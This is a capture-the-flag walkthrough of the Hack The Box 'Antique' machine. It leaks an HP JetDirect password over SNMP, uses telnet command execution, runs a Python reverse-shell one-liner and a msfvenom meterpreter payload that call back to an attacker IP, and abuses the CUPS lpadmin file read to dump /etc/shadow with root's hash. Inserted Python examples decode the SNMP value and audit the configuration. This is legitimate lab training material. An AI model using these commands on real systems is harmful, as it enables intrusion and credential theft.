Disclaimer

The host penetrated in this post was legally authorized. The tools and methods used here are for learning and exchange only; please do not use the tools and penetration ideas in this post for any illegal purpose. I take no responsibility for any consequences arising from this, nor for any misuse or damage caused.

Service enumeration

┌──(root㉿kali)-[~/htb/Antique]
└─# nmap -sV -Pn 10.10.11.107
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
Nmap scan report for 10.10.11.107
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds

Port 23 has a telnet service open. Let's connect with nc and take a look.

┌──(root㉿kali)-[~/htb/Antique]
└─# nc 10.10.11.107 23

HP JetDirect

ls
Password: 123456
Invalid password

The banner is HP JetDirect; a quick search shows this is HP's printer (print server) firmware.

Telnet requires a password to log in, but no username.

Searching Google for the keywords "HP JetDirect telnet" led me to this article.

Following the method from "Getting a JetDirect password remotely using the SNMP vulnerability", we run the following:

┌──(root㉿kali)-[~/htb/Antique]
└─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Created directory: /var/lib/snmp/cert_indexes
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

Feed the numbers above into this hex2text website and the password decodes to: P@ssw0rd@123!!123

Log in to telnet with the credentials above.
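The hex2text step above can be done offline, and doing it by hand makes the SNMP output easier to understand. net-snmp prints a BITS value twice: first the raw octets as two-digit hex (here, the password characters), then the indices of every bit that is set, numbered MSB-first from bit 0 of the first octet. The decoder below, an added example that is not part of the original writeup, finds the boundary between the two lists by checking that the index list is exactly the set-bit list of the octets before it, so it needs no guess about where the hex ends. The input line is constructed from the snmpget output quoted above. From a defender's side, this is why SNMPv1/v2c with the default "public" community must be disabled or restricted on printers: a read-only community string is enough to retrieve the admin password from this OID.

```python
# Added example (not from the original writeup): decode net-snmp's "BITS:"
# rendering of the HP JetDirect password OID into the cleartext password.
#
# Constructed from the snmpget output quoted in the writeup.
SNMPGET_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 "
    "21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 "
    "49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 "
    "115 119 122 123 126 130 131 134 135"
)


def set_bit_indices(octets):
    """Return the MSB-first bit indices (bit 0 = MSB of octet 0) set in octets."""
    indices = []
    for i, b in enumerate(octets):
        for bit in range(8):
            if b & (0x80 >> bit):
                indices.append(i * 8 + bit)
    return indices


def split_bits_value(line):
    """Recover the raw octets from a net-snmp 'BITS:' output line.

    net-snmp prints the hex octets followed by the decimal set-bit indices.
    Every split point k is tried: tokens[:k] must parse as octets and
    tokens[k:] must equal the set-bit indices of exactly those octets.
    """
    if "BITS:" not in line:
        raise ValueError("not a BITS value")
    tokens = line.split("BITS:", 1)[1].split()
    for k in range(1, len(tokens) + 1):
        head, tail = tokens[:k], tokens[k:]
        try:
            octets = bytes(int(t, 16) for t in head)   # ValueError if > 0xff
            indices = [int(t) for t in tail]
        except ValueError:
            continue
        if set_bit_indices(octets) == indices:
            return octets
    raise ValueError("no consistent octet/bit-index split found")


def decode_jetdirect_password(line):
    """Decode the BITS rendering of the JetDirect password OID to text."""
    return split_bits_value(line).decode("ascii")


if __name__ == "__main__":
    print(decode_jetdirect_password(SNMPGET_LINE))
```

The bit-index check matters because a token such as "21" is valid both as a hex octet and as a decimal index; only the consistency test tells the two lists apart.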

┌──(root㉿kali)-[~/htb/Antique]
└─# nc 10.10.11.107 23

HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name  Type of value
ip:             IP-address in dotted notation
subnet-mask:    address in dotted notation (enter 0 for default)
default-gw:     address in dotted notation (enter 0 for default)
syslog-svr:     address in dotted notation (enter 0 for default)
idle-timeout:   seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name:      alpha-numeric string (upper case only, 32 chars max)
dhcp-config:    0 to disable, 1 to enable
allow:          <ip> [mask] (0 to clear, list to display, 10 max)
addrawport:     <TCP port num> (<TCP port num> 3000-9000)
deleterawport:  <TCP port num>
listrawport:    (No parameter required)
exec:           execute system commands (exec id)
exit:           quit from telnet session

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
> exec whoami
lp
/var/spool/lpd
> exec find / -name user.txt
/home/lp/user.txt
/var/spool/lpd/user.txt

Privilege escalation

Check the system information

> exec uname -a
Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> exec python3 --version
Python 3.8.10

python3 is installed, so use the command below to get a more usable reverse shell.

exec python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
┌──(root㉿kali)-[~/htb/Antique]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
$ id
id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
$ 

We noticed that the lpadmin group looks suspicious and might be usable for privilege escalation. After some Googling I found this article.

It mentions:

members of lpadmin can read every file on server via cups

Members of this group can read any file on the system, so I kept searching for an escalation script and finally found an msf module, multi/escalate/cups_root_file_read, that can be used for this.
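For the defensive side of the lpadmin finding, here is a small host audit, added here as an example and not taken from the writeup or from the Metasploit module. It flags two things: accounts that are members of lpadmin (they may reconfigure cupsd through cupsctl, which is what the module relies on), and a cupsd.conf whose ErrorLog points outside the CUPS log directory. The module works by pointing ErrorLog at the target file and fetching it through the CUPS web interface (the "Not Found" HTML page later in this writeup is that interface answering for a missing file); that description of the module is from my own knowledge of it, not from the writeup. On patched CUPS the file-related directives were moved to cups-files.conf, which cupsctl cannot change, so the same check applies to that file there. The /etc/group and cupsd.conf contents are constructed sample input.

```python
# Added example (not part of the writeup or of the Metasploit module): audit
# lpadmin membership and the cupsd ErrorLog directive on a Linux host.
# Both inputs below are constructed sample data.

GROUP_FILE = """\
root:x:0:
lp:x:7:
lpadmin:x:19:lp,alice
sudo:x:27:alice
"""

CUPSD_CONF = """\
LogLevel warn
# ErrorLog has been pointed at a file cupsd should never read
ErrorLog /etc/shadow
Listen localhost:631
"""

CUPS_LOG_DIR = "/var/log/cups"   # default ErrorLog location on most distributions


def lpadmin_members(group_text):
    """Return the member list of the lpadmin group from /etc/group content."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "lpadmin":
            return [m for m in fields[3].split(",") if m]
    return []


def error_log_target(cupsd_conf_text):
    """Return the ErrorLog value from a cupsd.conf (None if not set)."""
    for line in cupsd_conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "errorlog":
            return parts[1].strip()
    return None


def error_log_redirected(cupsd_conf_text, log_dir=CUPS_LOG_DIR):
    """True when ErrorLog is an absolute path outside the CUPS log directory.

    Relative names (resolved by cupsd under its log directory), "syslog" and
    "stderr" are not absolute paths and are treated as not redirected.
    """
    target = error_log_target(cupsd_conf_text)
    if target is None or not target.startswith("/"):
        return False
    return not target.startswith(log_dir.rstrip("/") + "/")


def audit(group_text, cupsd_conf_text):
    """Return the list of findings; an empty list means nothing was flagged."""
    findings = []
    members = lpadmin_members(group_text)
    if members:
        findings.append("lpadmin members: " + ", ".join(members))
    if error_log_redirected(cupsd_conf_text):
        findings.append("cupsd ErrorLog redirected to " + error_log_target(cupsd_conf_text))
    return findings


if __name__ == "__main__":
    for finding in audit(GROUP_FILE, CUPSD_CONF):
        print("[!]", finding)
```

On a real host, read /etc/group and the live cupsd.conf (or cups-files.conf) instead of the constructed strings; a service account such as lp sitting in lpadmin, as on this box, is exactly the membership worth questioning.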

First we generate an msf reverse shell payload.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

Upload it to the target, trigger it, catch the Meterpreter session in msf, and run the escalation module.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] Sending stage (980808 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
[*] Cleaning up...
meterpreter > getuid

Look at the /etc/shadow file.

┌──(root㉿kali)-[~/htb/Antique]
└─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::

Edit it into a format john can read.

┌──(root㉿kali)-[~/htb/Antique]
└─# cat shadow.txt 
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::

┌──(root㉿kali)-[~/htb/Antique]
└─# unshadow passwd.txt shadow.txt > unshadowed.txt

┌──(root㉿kali)-[~/htb/Antique]
└─# cat unshadowed.txt 
root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash
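What `unshadow` does in the step above is a key-based merge: the `x` in the passwd password field is replaced by the hash field from the matching shadow entry. The added example below (not the writeup's own tooling) implements that merge and adds the triage a defender does on the same dump: separating accounts that carry a real password hash from locked ones, whose hash field is `*`, `!` or `!!` (or empty), which cannot authenticate with a password at all. In the shadow listing above only root has a real hash; the rest are locked. The passwd and shadow contents are constructed, with the root hash replaced by a placeholder.

```python
# Added example (not the writeup's own tooling): reproduce the unshadow merge and
# classify accounts in /etc/shadow as password-bearing or locked.
# Both inputs are constructed sample data; the hash is a placeholder.

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""

SHADOW = """\
root:$6$SALTSALT$HASHPLACEHOLDER:18760:0:99999:7:::
lp:*:18375:0:99999:7:::
alice:!:18389::::::
"""


def parse_shadow(shadow_text):
    """Map username -> hash field (second field) from /etc/shadow content."""
    hashes = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        hashes[fields[0]] = fields[1]
    return hashes


def is_locked(hash_field):
    """A hash field of '', '*', or anything starting with '!' cannot be used to log in."""
    return hash_field in ("", "*") or hash_field.startswith("!")


def classify_shadow(shadow_text):
    """Return (accounts with a real password hash, locked accounts)."""
    with_hash, locked = [], []
    for user, hash_field in parse_shadow(shadow_text).items():
        (locked if is_locked(hash_field) else with_hash).append(user)
    return with_hash, locked


def merge_passwd_shadow(passwd_text, shadow_text):
    """Rebuild passwd lines with the hash from shadow, as unshadow(8) does."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        # keep the original field (usually 'x') when no shadow entry exists
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return "\n".join(merged) + "\n"


if __name__ == "__main__":
    print(merge_passwd_shadow(PASSWD, SHADOW))
    print("with hash:", classify_shadow(SHADOW)[0], "locked:", classify_shadow(SHADOW)[1])
```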

But I was unable to crack this password.

So I changed approach: might there be an id_rsa file under /root?
Edit the msf module:

msf6 > use multi/escalate/cups_root_file_read
msf6 post(multi/escalate/cups_root_file_read) > edit

Change line 46 to /root/.ssh/id_rsa.

Save the edit.

Download the file locally:

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
[*] Cleaning up...

But the file does not exist; what was saved is the CUPS "Not Found" page rather than a key:

┌──(root㉿kali)-[~]
└─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <TITLE>Not Found - CUPS v1.6.1</TITLE>
        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
</HEAD>
<BODY>
<H1>Not Found</H1>
<P></P>
</BODY>
</HTML>

In the end I simply downloaded /root/root.txt locally. By the time I was done it was past one in the morning, which wraps up this penetration test.

meterpreter > run multi/escalate/cups_root_file_read

[!] SESSION may not be compatible with this module.
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
[*] Cleaning up...